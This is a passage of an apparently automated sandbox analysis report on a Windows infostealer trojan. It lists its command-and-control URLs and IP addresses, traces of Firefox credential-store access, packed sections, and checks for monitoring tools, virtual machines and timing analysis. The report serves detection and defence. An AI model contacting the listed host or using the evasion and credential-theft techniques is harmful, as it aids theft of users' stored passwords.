00000000.00000003.2228654050.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228954482.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2229045443.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339878402.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz/
              Source: b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz/.
              Source: b0ho5YYSdo.exe, 00000000.00000003.2229105379.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228954482.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2229045443.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228628808.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz/??
              Source: b0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2261752329.00000000054CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz/N
              Source: b0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2229792744.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2340795803.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230936460.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2109044489.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2229105379.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2279546614.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228654050.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228954482.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2229045443.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339878402.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228628808.000000000070B000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2261809944.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz/api
              Source: b0ho5YYSdo.exe, 00000000.00000003.2312595522.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2261752329.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2287988665.00000000054CB000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz/apiD
              Source: b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz/apig
              Source: b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz/apim
              Source: b0ho5YYSdo.exe, 00000000.00000003.2264629296.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2287190996.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2340795803.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2279546614.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339878402.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2261809944.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz/apisKLe
              Source: b0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2261752329.00000000054CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz/n
              Source: b0ho5YYSdo.exe, b0ho5YYSdo.exe, 00000000.00000003.2109044489.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz:443/api
              Source: b0ho5YYSdo.exe, 00000000.00000003.2312595522.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2261752329.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2287988665.00000000054CB000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz:443/api-4
              Source: b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz:443/api.default-release/key4.dbPK
              Source: b0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2287988665.00000000054CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz:443/apingwithouttoggle:430356
              Source: b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz:443/apionlineselextraction:330872
              Source: b0ho5YYSdo.exe, 00000000.00000003.2312595522.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz:443/apis
              Source: b0ho5YYSdo.exe, 00000000.00000003.2264798550.00000000057D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: b0ho5YYSdo.exe, 00000000.00000003.2264798550.00000000057D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: b0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
              Source: b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: b0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: b0ho5YYSdo.exe, 00000000.00000003.2264798550.00000000057D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
              Source: b0ho5YYSdo.exe, 00000000.00000003.2264798550.00000000057D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
              Source: b0ho5YYSdo.exe, 00000000.00000003.2264798550.00000000057D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: b0ho5YYSdo.exe, 00000000.00000003.2264798550.00000000057D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: b0ho5YYSdo.exe, 00000000.00000003.2264798550.00000000057D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: b0ho5YYSdo.exe, 00000000.00000003.2264798550.00000000057D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.9:49783 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.143.157:443 -> 192.168.2.9:49808 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.217:443 -> 192.168.2.9:49825 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.214:443 -> 192.168.2.9:49836 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49847 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49868 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49904 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49910 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49913 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49919 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49923 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49929 version: TLS 1.2

              System Summary

              barindex
              Source: b0ho5YYSdo.exeStatic PE information: section name:
              Source: b0ho5YYSdo.exeStatic PE information: section name: .idata
              Source: b0ho5YYSdo.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_054CF1130_3_054CF113
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_054CF1130_3_054CF113
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_054CCA3E0_3_054CCA3E
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_054CCA3E0_3_054CCA3E
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_054CF1130_3_054CF113
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_054CF1130_3_054CF113
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_054CCA3E0_3_054CCA3E
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_054CCA3E0_3_054CCA3E
              Source: b0ho5YYSdo.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: b0ho5YYSdo.exeStatic PE information: Section: ZLIB complexity 0.9996553308823529
              Source: b0ho5YYSdo.exeStatic PE information: Section: unozmjur ZLIB complexity 0.9951499701647675
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/6
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: b0ho5YYSdo.exe, 00000000.00000003.2230886950.0000000000753000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2247806882.00000000054F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: b0ho5YYSdo.exeVirustotal: Detection: 50%
              Source: b0ho5YYSdo.exeReversingLabs: Detection: 55%
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile read: C:\Users\user\Desktop\b0ho5YYSdo.exeJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: b0ho5YYSdo.exeStatic file information: File size 1834496 > 1048576
              Source: b0ho5YYSdo.exeStatic PE information: Raw size of unozmjur is bigger than: 0x100000 < 0x195e00

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeUnpacked PE file: 0.2.b0ho5YYSdo.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unozmjur:EW;stsqxyhb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;unozmjur:EW;stsqxyhb:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: b0ho5YYSdo.exeStatic PE information: real checksum: 0x1ccc81 should be: 0x1c8e1f
              Source: b0ho5YYSdo.exeStatic PE information: section name:
              Source: b0ho5YYSdo.exeStatic PE information: section name: .idata
              Source: b0ho5YYSdo.exeStatic PE information: section name:
              Source: b0ho5YYSdo.exeStatic PE information: section name: unozmjur
              Source: b0ho5YYSdo.exeStatic PE information: section name: stsqxyhb
              Source: b0ho5YYSdo.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_006DC364 pushad ; ret 0_3_006DC365
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_006DC360 pushad ; ret 0_3_006DC361
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_006DB648 push eax; iretd 0_3_006DB649
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_006DCB1C push 18006CC7h; retf 0_3_006DCB19
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_006DCAE9 push 18006CC7h; retf 0_3_006DCB19
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_006DFEF4 pushad ; retf 0_3_006DFEF5
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_00740C87 push esi; retf 0_3_00740C8B
              Source: b0ho5YYSdo.exeStatic PE information: section name: entropy: 7.989782766270618
              Source: b0ho5YYSdo.exeStatic PE information: section name: unozmjur entropy: 7.955220632675739

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: FA9188 second address: FA91A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4200FD2929h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: FA91A5 second address: FA91A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111C214 second address: 111C227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop esi 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jnl 00007F4200FD2916h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1102D63 second address: 1102D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1102D67 second address: 1102D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1102D72 second address: 1102D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
